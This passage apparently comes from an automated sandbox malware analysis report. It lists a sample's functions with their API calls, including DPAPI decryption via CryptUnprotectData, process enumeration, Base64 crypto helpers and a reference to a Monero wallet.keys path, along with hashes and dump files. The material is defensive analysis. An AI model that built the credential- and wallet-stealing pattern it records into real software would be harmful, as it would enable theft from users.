                                  • Opcode Fuzzy Hash: 84a317b99d7677ef83d73526f86dedf6bf18fe624b97e6d1bd399e3299bf239e
                                  • Instruction Fuzzy Hash: 72416E75D04219DBDB10DFA0DD89BFEBBB8AF88304F5041A8E509A7280D7705A84DF91
                                  Function 00F67240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00F6724D
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F67254
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00F67281
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00F672A4
                                  • LocalFree.KERNEL32(?), ref: 00F672AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: ebbdabffd9e7712e17428e3d5a21092150bc7fbd2e089eccc5142e851d71afa8
                                  • Instruction ID: bd81b3348061fab52bde2d7eeabd74cd5e4141832cf13cea3836795fa274e66d
                                  • Opcode Fuzzy Hash: ebbdabffd9e7712e17428e3d5a21092150bc7fbd2e089eccc5142e851d71afa8
                                  • Instruction Fuzzy Hash: 070140B5A40308BBDB24DFD4DD45F9E7B78AB44B05F104054FB15AB2C4DA70AA40CB64
                                  Function 00F79600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F7961E
                                  • Process32First.KERNEL32(00F80ACA,00000128), ref: 00F79632
                                  • Process32Next.KERNEL32(00F80ACA,00000128), ref: 00F79647
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 00F7965C
                                  • CloseHandle.KERNEL32(00F80ACA), ref: 00F7967A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: a49ee18948a7dd3a777b0d5e1393912829560877fe3e6767cd8d2d00c5ec2751
                                  • Instruction ID: 0e7d3953203187dd591e5c5c5c3a029ed050dd89b86c6fac3b93ea5d46aeb59f
                                  • Opcode Fuzzy Hash: a49ee18948a7dd3a777b0d5e1393912829560877fe3e6767cd8d2d00c5ec2751
                                  • Instruction Fuzzy Hash: A0015E75A00208EBCB24DFA4DC58BEEBBF8EF0C311F008299A90A97240D7749B80DF51
                                  Function 00F78680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00F805B7), ref: 00F786CA
                                  • Process32First.KERNEL32(?,00000128), ref: 00F786DE
                                  • Process32Next.KERNEL32(?,00000128), ref: 00F786F3
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                  • CloseHandle.KERNEL32(?), ref: 00F78761
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: 42f8ef88e8620d4e4e676c12a86b7c9f9478893b88d35f10cc077f24a9bcee14
                                  • Instruction ID: 66df61d542e11d95c5d27075016048e8cbfbaecc54bc0036b74b7a47ef29db1a
                                  • Opcode Fuzzy Hash: 42f8ef88e8620d4e4e676c12a86b7c9f9478893b88d35f10cc077f24a9bcee14
                                  • Instruction Fuzzy Hash: DD316D71901218ABCB28EF54DC45FEEB778EF84700F5081AAE11EA2190DF346A45DFA2
                                  Function 00F78EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,00F65184,40000001,00000000,00000000,?,00F65184), ref: 00F78EC0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: 95684035a6e977c369e35aec698ca54e44d2323b92107c64c34ca179113636d0
                                  • Instruction ID: fc4b768ee21868949790f4c1db9827463280fe4b5456e21563d3f5978ddd3934
                                  • Opcode Fuzzy Hash: 95684035a6e977c369e35aec698ca54e44d2323b92107c64c34ca179113636d0
                                  • Instruction Fuzzy Hash: AD111F71240205BFDB04CF64E888FBB37A9AF89750F10D459F9198B240DB35EC82EB61
                                  Function 00F69AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F64EEE,00000000,00000000), ref: 00F69AEF
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00F64EEE,00000000,?), ref: 00F69B01
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F64EEE,00000000,00000000), ref: 00F69B2A
                                  • LocalFree.KERNEL32(?,?,?,?,00F64EEE,00000000,?), ref: 00F69B3F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: c1a1de6496c51c6391b13130e843473994b2cf91a2990f1aadfe924fab73c664
                                  • Instruction ID: 05014c502e393d84ce16b2ef823240a51a42aac6de8a430ec68ae53d415985f2
                                  • Opcode Fuzzy Hash: c1a1de6496c51c6391b13130e843473994b2cf91a2990f1aadfe924fab73c664
                                  • Instruction Fuzzy Hash: 5611D4B4640208AFEB14CF64D895FAA77B9FB89B11F208058F9159B384C7B1AA41DB50
                                  Function 00F77980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00F80E00,00000000,?), ref: 00F779B0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F779B7
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00F80E00,00000000,?), ref: 00F779C4
                                  • wsprintfA.USER32 ref: 00F779F3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: d28d7e90658857e65ecc7bad53e42f7725499d6723d4e8beabe6948595711dac
                                  • Instruction ID: 8f1d93e842513fbde3850f93d8f21e9bc63f341e727d0d62512b4c6c2d3fd188
                                  • Opcode Fuzzy Hash: d28d7e90658857e65ecc7bad53e42f7725499d6723d4e8beabe6948595711dac
                                  • Instruction Fuzzy Hash: 05113CB2904118ABCB14DFD9E945BBEBBF8FB4CB12F10411AF615A2284D3395940DBB1
                                  Function 00F77A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,016FDD60,00000000,?,00F80E10,00000000,?,00000000,00000000), ref: 00F77A63
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F77A6A
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,016FDD60,00000000,?,00F80E10,00000000,?,00000000,00000000,?), ref: 00F77A7D
                                  • wsprintfA.USER32 ref: 00F77AB7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  • Opcode ID: 5dd3c5e1aee46b94c58dad76f5cec84e3ec65acdcfb67773777c9d6da3c55ea7
                                  • Instruction ID: 3ec1561f5e96ce113a0490dd7843b49b596a035ba1887f9824929d65c77f6996
                                  • Opcode Fuzzy Hash: 5dd3c5e1aee46b94c58dad76f5cec84e3ec65acdcfb67773777c9d6da3c55ea7
                                  • Instruction Fuzzy Hash: 791182B1945218DBEB249F54DC45FA9BB78FB44721F1047E6E91A932C0C7785E40CF51
                                  Function 00F73720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoCreateInstance.COMBASE(00F7E118,00000000,00000001,00F7E108,00000000), ref: 00F73758
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00F737B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  • Opcode ID: 51da41508de41b7a2a166d34ad81beff9bdb1f4682b468da0ac0d0cf3ee5695d
                                  • Instruction ID: a4c3fdf6aa78c0db109a56efade5fc65ab35eb8ec726b27d02025a404b7a1a34
                                  • Opcode Fuzzy Hash: 51da41508de41b7a2a166d34ad81beff9bdb1f4682b468da0ac0d0cf3ee5695d
                                  • Instruction Fuzzy Hash: 0C410A71A40A28AFDB24DB54CC85B9BB7B4BB48302F4081D9E619E7290D771AEC5CF51
                                  Function 00F69B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00F69B84
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00F69BA3
                                  • LocalFree.KERNEL32(?), ref: 00F69BD3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: e9b2e091215bbd079728d4f17e9a631b9034c679ee394c04bbb18e0ca4419420
                                  • Instruction ID: 7f6ec704158eb49c343850dc4665c09b81383d10b7fc8dba71abec9ab8c08863
                                  • Opcode Fuzzy Hash: e9b2e091215bbd079728d4f17e9a631b9034c679ee394c04bbb18e0ca4419420
                                  • Instruction Fuzzy Hash: A211CCB8A00209DFDB04DF94D985AAE77B9FF88300F104568E91597394D774AE50CFA1
                                  Function 01239DF1 Relevance: 2.7, Strings: 2, Instructions: 210COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: B|}$$w;
                                  • API String ID: 0-4193640250
                                  • Opcode ID: 26cd4df856a06c6d9cc977a816cc82a3bbc9fc4935480e16878d49d1fddf3479
                                  • Instruction ID: af139a12045831ab041713102206c3f8487424daa63111b8814da68be3582d8f
                                  • Opcode Fuzzy Hash: 26cd4df856a06c6d9cc977a816cc82a3bbc9fc4935480e16878d49d1fddf3479
                                  • Instruction Fuzzy Hash: 905109F36186009FF304AE29EC8577AB7D5EBD4320F16893DEAC5C3740E93598058693
                                  Function 0130399A Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
